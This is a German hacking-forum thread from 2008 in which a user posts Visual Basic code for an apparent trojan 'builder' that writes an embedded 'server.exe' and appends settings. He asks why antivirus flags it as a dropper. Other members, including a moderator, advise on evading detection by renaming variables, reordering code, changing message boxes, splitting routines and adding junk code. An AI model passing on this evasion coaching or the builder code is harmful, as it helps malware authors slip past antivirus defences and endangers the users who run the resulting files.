|
| Autor |
Nachricht |
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Builder -> TR/Dropper.Gen
Verfasst am: 20.01.2008, 20:06 |
|
|
Hallo,
mir ist bei meinen einigen Projekten schon einige Male aufgefallen, dass mein Builder als Trojaner/Dropper erkannt wird. Dies macht natürlich auf den User nicht einen sooo guten Eindruck.
Ich würde gerne wissen, ob es eine Möglichkeit gibt, dies zu ändern.
Hier auch mal ein Code vom Builder:
| Code: | Private Sub Build(pfad As String)
On Error GoTo Err:
Dim buffer() As Byte
buffer = LoadResData(101, "CUSTOM")
Open pfad For Binary As #1
Put #1, , buffer()
Close #1
Dim Options As String * 100
Options = Text1.Text & "#" & Text2.Text & "#" & Text3.Text & "#"
Open pfad For Binary As #1
Put #1, LOF(1) + 1, Options
Close #1
MsgBox "Server wurde erstellt!", vbInformation, "...."
Exit Sub
Err:
MsgBox "Server konnte leider nicht erstellt werden!", vbCritical, "...."
Unload Me
End Sub
Private Sub cmd_build_Click()
Build ("server.exe")
Unload Me
End Sub
|
MFG RaG3 |
|
| |
|
 |
ZiG_
Überflieger
Anmeldedatum: 07.03.2007
Beiträge: 1248
|
Verfasst am: 20.01.2008, 20:10 |
|
|
Der Code von tutorial und andere die noch so rumschwirren, werden natürlich schon detected sein.
Mußt halt etwas verändern.
Wer nicht auf seine Weise denkt, denkt überhaupt nicht. (Oscar Wilde) |
|
| |
|
|
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Verfasst am: 20.01.2008, 20:23 |
|
|
Was speziell? Den Namen der Sub oder gibt's andere Möglichkeiten?
MFG RaG3 |
|
| |
|
|
Teto_
Poster
Anmeldedatum: 28.02.2007
Beiträge: 106
|
Verfasst am: 20.01.2008, 20:24 |
|
|
| variablennamen und das ganze zeug. |
|
| |
|
|
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Verfasst am: 20.01.2008, 20:35 |
|
|
Was ist das ganze Zeug?
Sprich ich habe eig nur einen Variablennamen in meinem oben genannten Source. Darf ich Options und Buffer überhaupt ändern?
Edit:
Hab's mal geändert, wird nach wievor noch erkannt
| Code: | Private Sub home(duac As String)
On Error GoTo Err:
Dim buffer() As Byte
buffer = LoadResData(101, "CUSTOM")
Open duac For Binary As #1
Put #1, , buffer()
Close #1
Dim Options As String * 100
Options = Text1.Text & "#" & Text2.Text & "#" & Text3.Text & "#"
Open duac For Binary As #1
Put #1, LOF(1) + 1, Options
Close #1
MsgBox "Server wurde erstellt!", vbInformation, "yyy"
Exit Sub
Err:
MsgBox "Server konnte leider nicht erstellt werden!", vbCritical, "xKy"
Unload Me
End Sub
Private Sub cmd_build_Click()
home ("url.exe")
Unload Me |
MFG RaG3 |
|
| |
|
|
ZiG_
Überflieger
Anmeldedatum: 07.03.2007
Beiträge: 1248
|
Verfasst am: 20.01.2008, 20:40 |
|
|
Du kannst ändern was du willst, obwohl teorethisch Variablennamen und Funktionsnamen nichts ausmachen werden was ich so weiß.
Am besten ist es, wenn du den Ablauf etwas änderst.
Wer nicht auf seine Weise denkt, denkt überhaupt nicht. (Oscar Wilde) |
|
| |
|
|
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Verfasst am: 20.01.2008, 20:44 |
|
|
Ablauf ändern, da fällt mir jetzt spontan ein , das Einbringen von (kleinen) Pausen. Wäre dies so eine Möglichkeit? Was gibt's noch so?
MFG RaG3 |
|
| |
|
|
ZiG_
Überflieger
Anmeldedatum: 07.03.2007
Beiträge: 1248
|
Verfasst am: 20.01.2008, 20:48 |
|
|
Ne so meinte ich das nicht ^^
Probiers mal so:
| Code: |
Private Sub home(duac As String)
On Error GoTo Err:
Dim str1() As Byte
Dim att As String * 100
Dim ff as integer
ff = FreeFile
att = Text1.Text & "%" & Text2.Text & "%" & Text3.Text & "%"
str1 = LoadResData(101, "CUSTOM")
Open duac For Binary As #ff
Put #ff, , str1()
close #ff
Open duac For Binary As #ff
Put #ff, LOF(1) + 1, att
Close #ff
MsgBox "Server wurde erstellt!", vbInformation, "yyy"
Exit Sub
Err:
MsgBox "Server konnte leider nicht erstellt werden!", vbCritical, "xKy"
Unload Me
End Sub
|
Wer nicht auf seine Weise denkt, denkt überhaupt nicht. (Oscar Wilde) |
|
| |
|
|
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Verfasst am: 20.01.2008, 20:53 |
|
|
Wird immer noch erkannt. Allerdings weiß ich jetzt was ich zu tun habe 
Hat FreeFile eine bestimmte Bedeutung?(Dann hör ich auch auf zu fragen, versprochen  )
MFG RaG3 |
|
| |
|
|
ZiG_
Überflieger
Anmeldedatum: 07.03.2007
Beiträge: 1248
|
Verfasst am: 20.01.2008, 20:58 |
|
|
FreeFile ermittelt eine freie Nummer.
Man kommt sich also nicht in die Quere wenn wo anders ebenfalls ne Datei geöffnet ist.
Evt. liegt es an einem anderen Code teil.
Was AV Hersteller ebenfalls gerne haben sind Messagebox Ausgaben.
Evt. mal diese etwas ändern.
Wer nicht auf seine Weise denkt, denkt überhaupt nicht. (Oscar Wilde) |
|
| |
|
|
RaG3!_
Poster
Anmeldedatum: 26.07.2007
Beiträge: 104
|
Verfasst am: 20.01.2008, 21:10 |
|
|
Ich wollte ja eigentlich nicht mehr posten, aber ich muss mich mehr oder weniger damit zufrieden geben...
| Code: | | Call MsgBox("Alles ok", vbApplicationModal, "COD4") |
Bringt auch nix, Dank dir trotzdem
MFG RaG3 |
|
| |
|
|
c0re_
« Moderator »
Anmeldedatum: 29.11.2007
Beiträge: 425
|
Verfasst am: 20.01.2008, 21:53 |
|
|
Du kannst den Ablauf auch sehr heftig verändern, indem du deine Sub aufsplittest. Unterteil sie in einzelne Subs und Funktionen, am besten in Modulen. Oder füg einfach Trashcode ein. |
|
| |
|
|
Registrieren
Login
